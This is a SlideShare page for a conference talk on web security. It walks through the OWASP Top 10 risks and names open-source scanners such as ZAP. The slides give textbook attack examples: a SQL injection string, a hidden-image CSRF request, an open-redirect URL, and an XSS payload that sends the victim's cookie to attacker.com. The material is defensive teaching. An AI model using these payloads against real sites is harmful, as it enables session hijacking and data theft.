SlideShare a Scribd company logo

Securing the Web @RivieraDev2016

Download as PPTX, PDF
Sumanth Damarla
Sumanth Damarla

With the right skills, tools and software, you can protect yourself and remain secure. This presentation will take you from no knowledge of open source web security tools to a deep understanding of how to use them and their growing set of capabilities. This is a rare opportunity to learn how to use advanced ZAP features.

Technology
1 of 52
SUMANTH DAMARLA @Sumanth_Damarla Mozilla Rep Mozilla Tech Speaker
OWASP TOP 10
INJECTION
INJECTION Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
EXAMPLES Scenario #1: The application uses untrusted data in the construction of the following vulnerable SQL call: String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"; In this cases, the attacker modifies the ‘id’ parameter value in her browser to send: ' or '1'='1. For example: http://example.com/app/accountView?id=' or '1'='1 This changes the meaning of the query to return all the records from the accounts table. More dangerous attacks could modify data or even invoke stored procedures.
HACKER GOALS ➔Information Leakage ➔Disclosure of data ➔Manipulation of stored data ➔Bypassing Authorisation Controls
Broken Authentication and Session Management
Broken Authentication and Session Management Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.
EXAMPLES Scenario #1: Airline reservations application supports URL rewriting, putting session IDs in the URL: http://example.com/sale/saleitems?sessionid=268544541&dest=Hawaii An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card. Scenario #2: Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.
HACKER GOALS ➔Undermined authorization and accountability controls ➔Cause privacy violation ➔Identity Theft
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
EXAMPLES The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>"; The attacker modifies the 'CC' parameter in their browser to: '><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi ?foo='+document.cookie</script>'. This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.
HACKER GOALS ➔Cookie Stealing ➔Alert pop-up on page ➔Redirecting to another website/page/phishing site. ➔Executing browser exploits.
Insecure Direct Object References
Insecure Direct Object References A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
EXAMPLE The application uses unverified data in a SQL call that is accessing account information: String query = "SELECT * FROM accts WHERE account = ?"; PreparedStatement pstmt = connection.prepareStatement(query , … ); pstmt.setString( 1, request.getParameter("acct")); ResultSet results = pstmt.executeQuery( ); The attacker simply modifies the ‘acct’ parameter in their browser to send whatever account number they want. If not verified, the attacker can access any user’s account, instead of only the intended customer’s account. http://example.com/app/accountInfo?acct=notmyacct
Security Misconfiguration
Security Misconfiguration Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.
EXAMPLES Scenario #1: The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over. Scenario #2: App server comes with sample applications that are not removed from your production server. Said sample applications have well known security flaws attackers can use to compromise your server.
Sensitive Data Exposure
Sensitive Data Exposure Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
EXAMPLES Scenario #1: An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key. Scenario #2: A site simply doesn’t use SSL for all authenticated pages. Attacker simply monitors network traffic (like an open wireless network), and steals the user’s session cookie. Attacker then replays this cookie and hijacks the user’s session, accessing the user’s private data.
Missing Function Level Access Control
Missing Function Level Access Control Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.
EXAMPLES Scenario #1: The attacker simply force browses to target URLs. The following URLs require authentication. Admin rights are also required for access to the admin_getappInfo page. http://example.com/app/getappInfo http://example.com/app/admin_getappInfo If an unauthenticated user can access either page, that’s a flaw. If an authenticated, non-admin, user is allowed to access theadmin_getappInfo page, this is also a flaw, and may lead the attacker to more improperly protected admin pages.
Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
EXAMPLE The application allows a user to submit a state changing request that does not include anything secret. For example: http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243 So, the attacker constructs a request that will transfer money from the victim’s account to the attacker’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control: <img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
Using Components with Known Vulnerabilities
Using Components with Known Vulnerabilities Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.
EXAMPLE Heartbleed
Unvalidated Redirects and Forwards
Unvalidated Redirects and Forwards Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
EXAMPLES Scenario #1: The application has a page called “redirect.jsp” which takes a single parameter named “url”. The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware. http://www.example.com/redirect.jsp?url=evil.com
Open Web App Security tools
GRABBER Grabber is a web application scanner. Basically it detects some kind of vulnerabilities in your website. Grabber is simple, not fast but portable and really adaptable. This software is designed to scan small websites such as personals, forums etc. absolutely not big application: it would take too long time and flood your network.
It can detect the following vulnerabilities: ➔ Cross site scripting ➔ SQL injection ➔ File inclusion ➔ JS source code analyzer ➔ Backup file check
VEGA Vulnerability Scanner
It can detect the following vulnerabilities ➔ Cross Site Scripting (XSS) ➔ SQL Injection ➔ Directory Traversal ➔ URL Injection ➔ Error Detection ➔ File Uploads ➔ Sensitive Data Discovery
Zed Attack Proxy(ZAP)
ZAP Features ➔Open source Cross platform ➔Easy to install (just requires java 1.7) ➔Completely free (no paid for 'Pro' version) ➔Ease of use a priority ➔Comprehensive help pages ➔Fully internationalized Translated into a dozen languages ➔Community based, with involvement actively encouraged ➔Under active development by an international team of volunteers
ZAP Functionality ➔Intercepting Proxy ➔Traditional and AJAX spiders ➔Automated scanner ➔Passive scanner ➔Forced browsing ➔Fuzzer ➔Dynamic SSL certificates ➔Smartcard and Client Digital Certificates support
➔Authentication and session support ➔Powerful REST based API ➔Automatic updating option ➔Integrated and growing marketplace of add-ons
Thank you! @Sumanth_Damarla
Securing the Web @RivieraDev2016

Recommended

Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
Sperasoft
 
Owasp web security
Owasp web securityOwasp web security
Owasp web security
Pankaj Kumar Sharma
 
Securing the Web@VoxxedDays2017
Securing the Web@VoxxedDays2017Securing the Web@VoxxedDays2017
Securing the Web@VoxxedDays2017
Sumanth Damarla
 
A10 - Unvalidated Redirects and Forwards
A10 - Unvalidated Redirects and ForwardsA10 - Unvalidated Redirects and Forwards
A10 - Unvalidated Redirects and Forwards
Shane Stanley
 
T04505103106
T04505103106T04505103106
T04505103106
IJERA Editor
 
C01461422
C01461422C01461422
C01461422
IOSR Journals
 
Security Awareness
Security AwarenessSecurity Awareness
Security Awareness
Lucas Hendrich
 
React security vulnerabilities
React security vulnerabilitiesReact security vulnerabilities
React security vulnerabilities
AngelinaJasper
 

Recommended

Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
Sperasoft
 
Owasp web security
Owasp web securityOwasp web security
Owasp web security
Pankaj Kumar Sharma
 
Securing the Web@VoxxedDays2017
Securing the Web@VoxxedDays2017Securing the Web@VoxxedDays2017
Securing the Web@VoxxedDays2017
Sumanth Damarla
 
A10 - Unvalidated Redirects and Forwards
A10 - Unvalidated Redirects and ForwardsA10 - Unvalidated Redirects and Forwards
A10 - Unvalidated Redirects and Forwards
Shane Stanley
 
T04505103106
T04505103106T04505103106
T04505103106
IJERA Editor
 
C01461422
C01461422C01461422
C01461422
IOSR Journals
 
Security Awareness
Security AwarenessSecurity Awareness
Security Awareness
Lucas Hendrich
 
React security vulnerabilities
React security vulnerabilitiesReact security vulnerabilities
React security vulnerabilities
AngelinaJasper
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Chris Hillman
 
Web Application Security Tips
Web Application Security TipsWeb Application Security Tips
Web Application Security Tips
tcellsn
 
Web application security I
Web application security IWeb application security I
Web application security I
Md Syed Ahamad
 
Security 101
Security 101Security 101
Security 101
George V. Reilly
 
Owasp Top 10-2013
Owasp Top 10-2013Owasp Top 10-2013
Owasp Top 10-2013
n|u - The Open Security Community
 
Hackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingHackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
Threat modeling driven security testing
Threat modeling driven security testingThreat modeling driven security testing
Threat modeling driven security testing
Paúl Sn
 
Vulnerability manager v1.0
Vulnerability manager v1.0Vulnerability manager v1.0
Vulnerability manager v1.0
Finto Thomas , CISSP, TOGAF, CCSP, ITIL. JNCIS
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Colin English
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
Albena Asenova-Belal
 
Secure Code Warrior - Authentication
Secure Code Warrior - AuthenticationSecure Code Warrior - Authentication
Secure Code Warrior - Authentication
Secure Code Warrior
 
Step by step guide for web application security testing
Step by step guide for web application security testingStep by step guide for web application security testing
Step by step guide for web application security testing
Avyaan, Web Security Company in India
 
Owasp eee 2015 csrf
Owasp eee 2015 csrfOwasp eee 2015 csrf
Owasp eee 2015 csrf
Aurelijus Stanislovaitis
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
Samvel Gevorgyan
 
OWASP Top 10 Overview
OWASP Top 10 OverviewOWASP Top 10 Overview
OWASP Top 10 Overview
PiTechnologies
 
Hack applications
Hack applicationsHack applications
Hack applications
enrizmoore
 
Sania: Syntactic and Semantic Analysis for Automated Testing against SQL Inje...
Sania: Syntactic and Semantic Analysis for Automated Testing against SQL Inje...Sania: Syntactic and Semantic Analysis for Automated Testing against SQL Inje...
Sania: Syntactic and Semantic Analysis for Automated Testing against SQL Inje...
Yuji Kosuga
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
Marco Morana
 
Stateless Anti-Csrf
Stateless Anti-CsrfStateless Anti-Csrf
Stateless Anti-Csrf
johnwilander
 
Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013
Vishrut Sharma
 
Secure Software Engineering
Secure Software EngineeringSecure Software Engineering
Secure Software Engineering
Rohitha Liyanagama
 

More Related Content

What's hot

Hackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingHackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Colin English
 
Hack applications
Hack applicationsHack applications
Hack applications
enrizmoore
 
Sania: Syntactic and Semantic Analysis for Automated Testing against SQL Inje...
Sania: Syntactic and Semantic Analysis for Automated Testing against SQL Inje...Sania: Syntactic and Semantic Analysis for Automated Testing against SQL Inje...
Sania: Syntactic and Semantic Analysis for Automated Testing against SQL Inje...
Yuji Kosuga
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
Marco Morana
 
Stateless Anti-Csrf
Stateless Anti-CsrfStateless Anti-Csrf
Stateless Anti-Csrf
johnwilander
 

What's hot (20)

Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Web Application Security Tips
Web Application Security TipsWeb Application Security Tips
Web Application Security Tips
 
Web application security I
Web application security IWeb application security I
Web application security I
 
Security 101
Security 101Security 101
Security 101
 
Owasp Top 10-2013
Owasp Top 10-2013Owasp Top 10-2013
Owasp Top 10-2013
 
Hackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingHackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web Programming
 
Threat modeling driven security testing
Threat modeling driven security testingThreat modeling driven security testing
Threat modeling driven security testing
 
Vulnerability manager v1.0
Vulnerability manager v1.0Vulnerability manager v1.0
Vulnerability manager v1.0
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
 
Secure Code Warrior - Authentication
Secure Code Warrior - AuthenticationSecure Code Warrior - Authentication
Secure Code Warrior - Authentication
 
Step by step guide for web application security testing
Step by step guide for web application security testingStep by step guide for web application security testing
Step by step guide for web application security testing
 
Owasp eee 2015 csrf
Owasp eee 2015 csrfOwasp eee 2015 csrf
Owasp eee 2015 csrf
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
OWASP Top 10 Overview
OWASP Top 10 OverviewOWASP Top 10 Overview
OWASP Top 10 Overview
 
Hack applications
Hack applicationsHack applications
Hack applications
 
Sania: Syntactic and Semantic Analysis for Automated Testing against SQL Inje...
Sania: Syntactic and Semantic Analysis for Automated Testing against SQL Inje...Sania: Syntactic and Semantic Analysis for Automated Testing against SQL Inje...
Sania: Syntactic and Semantic Analysis for Automated Testing against SQL Inje...
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
Stateless Anti-Csrf
Stateless Anti-CsrfStateless Anti-Csrf
Stateless Anti-Csrf
 

Similar to Securing the Web @RivieraDev2016

xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdf
yashvirsingh48
 

Similar to Securing the Web @RivieraDev2016 (20)

Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013
 
Secure Software Engineering
Secure Software EngineeringSecure Software Engineering
Secure Software Engineering
 
OWASP Evening #10
OWASP Evening #10OWASP Evening #10
OWASP Evening #10
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application Security
 
Security Testing Training With Examples
Security Testing Training With ExamplesSecurity Testing Training With Examples
Security Testing Training With Examples
 
gpt.AI.docx
gpt.AI.docxgpt.AI.docx
gpt.AI.docx
 
OWASP Evening #10 Serbia
OWASP Evening #10 SerbiaOWASP Evening #10 Serbia
OWASP Evening #10 Serbia
 
Alert logic anatomy owasp infographic
Alert logic anatomy owasp infographicAlert logic anatomy owasp infographic
Alert logic anatomy owasp infographic
 
Vulnerabilities in Web Applications
Vulnerabilities in Web ApplicationsVulnerabilities in Web Applications
Vulnerabilities in Web Applications
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmers
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Security risks awareness
Security risks awarenessSecurity risks awareness
Security risks awareness
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdf
 
Secure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdfSecure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdf
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
OWASP TOP 10 by Team xbios
OWASP TOP 10 by Team xbiosOWASP TOP 10 by Team xbios
OWASP TOP 10 by Team xbios
 
owasp top 10.ppt
owasp top 10.pptowasp top 10.ppt
owasp top 10.ppt
 
Owasp Top 10 2017
Owasp Top 10 2017Owasp Top 10 2017
Owasp Top 10 2017
 

Recently uploaded

Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 

Recently uploaded (20)

Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 

Securing the Web @RivieraDev2016

  • 1.
  • 3.
  • 4.
  • 5.
  • 8. INJECTION Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
  • 9. EXAMPLES Scenario #1: The application uses untrusted data in the construction of the following vulnerable SQL call: String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"; In this cases, the attacker modifies the ‘id’ parameter value in her browser to send: ' or '1'='1. For example: http://example.com/app/accountView?id=' or '1'='1 This changes the meaning of the query to return all the records from the accounts table. More dangerous attacks could modify data or even invoke stored procedures.
  • 10. HACKER GOALS ➔Information Leakage ➔Disclosure of data ➔Manipulation of stored data ➔Bypassing Authorisation Controls
  • 11. Broken Authentication and Session Management
  • 12.
  • 13. Broken Authentication and Session Management Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.
  • 14. EXAMPLES Scenario #1: Airline reservations application supports URL rewriting, putting session IDs in the URL: http://example.com/sale/saleitems?sessionid=268544541&dest=Hawaii An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card. Scenario #2: Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.
  • 15. HACKER GOALS ➔Undermined authorization and accountability controls ➔Cause privacy violation ➔Identity Theft
  • 17. Cross-Site Scripting (XSS) XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
  • 18. EXAMPLES The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>"; The attacker modifies the 'CC' parameter in their browser to: '><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi ?foo='+document.cookie</script>'. This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.
  • 19. HACKER GOALS ➔Cookie Stealing ➔Alert pop-up on page ➔Redirecting to another website/page/phishing site. ➔Executing browser exploits.
  • 21. Insecure Direct Object References A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
  • 22. EXAMPLE The application uses unverified data in a SQL call that is accessing account information: String query = "SELECT * FROM accts WHERE account = ?"; PreparedStatement pstmt = connection.prepareStatement(query , … ); pstmt.setString( 1, request.getParameter("acct")); ResultSet results = pstmt.executeQuery( ); The attacker simply modifies the ‘acct’ parameter in their browser to send whatever account number they want. If not verified, the attacker can access any user’s account, instead of only the intended customer’s account. http://example.com/app/accountInfo?acct=notmyacct
  • 24. Security Misconfiguration Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.
  • 25. EXAMPLES Scenario #1: The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over. Scenario #2: App server comes with sample applications that are not removed from your production server. Said sample applications have well known security flaws attackers can use to compromise your server.
  • 27. Sensitive Data Exposure Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
  • 28. EXAMPLES Scenario #1: An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key. Scenario #2: A site simply doesn’t use SSL for all authenticated pages. Attacker simply monitors network traffic (like an open wireless network), and steals the user’s session cookie. Attacker then replays this cookie and hijacks the user’s session, accessing the user’s private data.
  • 29. Missing Function Level Access Control
  • 30. Missing Function Level Access Control Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.
  • 31. EXAMPLES Scenario #1: The attacker simply force browses to target URLs. The following URLs require authentication. Admin rights are also required for access to the admin_getappInfo page. http://example.com/app/getappInfo http://example.com/app/admin_getappInfo If an unauthenticated user can access either page, that’s a flaw. If an authenticated, non-admin, user is allowed to access theadmin_getappInfo page, this is also a flaw, and may lead the attacker to more improperly protected admin pages.
  • 33. Cross-Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
